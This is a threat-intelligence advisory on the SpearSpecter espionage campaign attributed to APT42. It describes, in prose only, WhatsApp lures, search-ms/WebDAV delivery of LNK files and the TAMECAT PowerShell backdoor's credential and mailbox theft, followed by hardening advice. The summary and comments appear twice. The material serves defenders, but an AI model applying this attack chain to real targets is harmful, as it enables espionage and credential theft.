Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets
Summary:
SpearSpecter is an ongoing, highly targeted espionage campaign attributed with high confidence to Iranian state-aligned operators working on behalf of the IRGC Intelligence Organization and overlapping with APT42 / Mint Sandstorm / Educated Manticore / CharmingCypress. The operation focuses on senior defense and government official, and in some cases, their families, using long-running, personalized social-engineering lures such as conference invitations and meeting requests, increasingly extended onto WhatsApp to build trust. Once a relationship is established, victims are steered to malicious “meeting documents” hosted on legitimate services that abuse the Windows search-ms protocol to connect to attacker-controlled WebDAV infrastructure and deliver a weaponized LNK file. That shortcut then pulls down and executes a batch-based loader from Cloudflare Workers, which deploys TAMECAT, a modular, fileless PowerShell backdoor. TAMECAT maintains persistence, rotates through multiple C2 paths, and is heavily obfuscated and encrypted. Its modules systematically harvest high-value content—documents, browser data and cookies, Chrome/Edge credentials, Outlook OST mailboxes, and screenshots—while chunking and exfiltrating data via HTTPS and FTP using helper components such as Runs.dll. The campaign leans heavily on cloud and shared hosting and Windows LOLBins to blend into normal traffic and reduce forensic traces.
Security Officer Comments:
SpearSpecter illustrates the maturation of APT42-style tradecraft: slow-burn, relationship-driven social engineering coupled with technically sophisticated, cloud-heavy, and fileless post-compromise activity. The use of WhatsApp, OneDrive, Cloudflare Workers, Telegram, and Discord as part of a single kill chain shows how easily state actors can hide inside the same collaboration and messaging ecosystems their victims rely on daily. TAMECAT’s design, modular PowerShell, in-memory execution, AES-encrypted tasking, chunked uploads with Runs.dll, and smart browser data theft via Edge remote debugging and Chrome suspension, signals a clear shift toward stealthy, intelligence-first access rather than smash-and-grab operations.
Suggested Corrections:
https://thehackernews.com/2025/11/iranian-hackers-launch-spearspecter-spy.html
SpearSpecter is an ongoing, highly targeted espionage campaign attributed with high confidence to Iranian state-aligned operators working on behalf of the IRGC Intelligence Organization and overlapping with APT42 / Mint Sandstorm / Educated Manticore / CharmingCypress. The operation focuses on senior defense and government official, and in some cases, their families, using long-running, personalized social-engineering lures such as conference invitations and meeting requests, increasingly extended onto WhatsApp to build trust. Once a relationship is established, victims are steered to malicious “meeting documents” hosted on legitimate services that abuse the Windows search-ms protocol to connect to attacker-controlled WebDAV infrastructure and deliver a weaponized LNK file. That shortcut then pulls down and executes a batch-based loader from Cloudflare Workers, which deploys TAMECAT, a modular, fileless PowerShell backdoor. TAMECAT maintains persistence, rotates through multiple C2 paths, and is heavily obfuscated and encrypted. Its modules systematically harvest high-value content—documents, browser data and cookies, Chrome/Edge credentials, Outlook OST mailboxes, and screenshots—while chunking and exfiltrating data via HTTPS and FTP using helper components such as Runs.dll. The campaign leans heavily on cloud and shared hosting and Windows LOLBins to blend into normal traffic and reduce forensic traces.
Security Officer Comments:
SpearSpecter illustrates the maturation of APT42-style tradecraft: slow-burn, relationship-driven social engineering coupled with technically sophisticated, cloud-heavy, and fileless post-compromise activity. The use of WhatsApp, OneDrive, Cloudflare Workers, Telegram, and Discord as part of a single kill chain shows how easily state actors can hide inside the same collaboration and messaging ecosystems their victims rely on daily. TAMECAT’s design, modular PowerShell, in-memory execution, AES-encrypted tasking, chunked uploads with Runs.dll, and smart browser data theft via Edge remote debugging and Chrome suspension, signals a clear shift toward stealthy, intelligence-first access rather than smash-and-grab operations.
Suggested Corrections:
- Strengthen host visibility to counter SpearSpecter’s fileless techniques: enable PowerShell Script Block Logging, deploy Sysmon with SIEM ingestion, and ensure an EDR is actively monitoring in-memory execution. Build behavior-based detections from this campaign’s TTPs and run retro-hunts with the provided IOCs, especially for organizations likely to interest IRGC-aligned actors.
- Because APT42 relies heavily on executive-focused social engineering, provide targeted awareness training for senior staff. Emphasize that convincing outreach—even via WhatsApp or legitimate organizations—should be independently verified through known internal contacts before opening links or documents.
- Disable the abused search-ms protocol via registry changes to block a key delivery vector. On the network side, baseline normal access to cloud services (Cloudflare Workers, Firebase, Discord, Telegram) and alert on deviations. Use a proxy with inspection to identify suspicious patterns, and block Telegram/Discord if they are not used for business.
- Harden endpoints by enforcing PowerShell Constrained Language Mode, enabling AMSI, and maintaining Script Block Logging. Apply application control (EPM, AppLocker, WDAC) to prevent unauthorized binaries, scripts, and LNK files from executing, reducing the actor’s ability to persist or move stealthily.
https://thehackernews.com/2025/11/iranian-hackers-launch-spearspecter-spy.html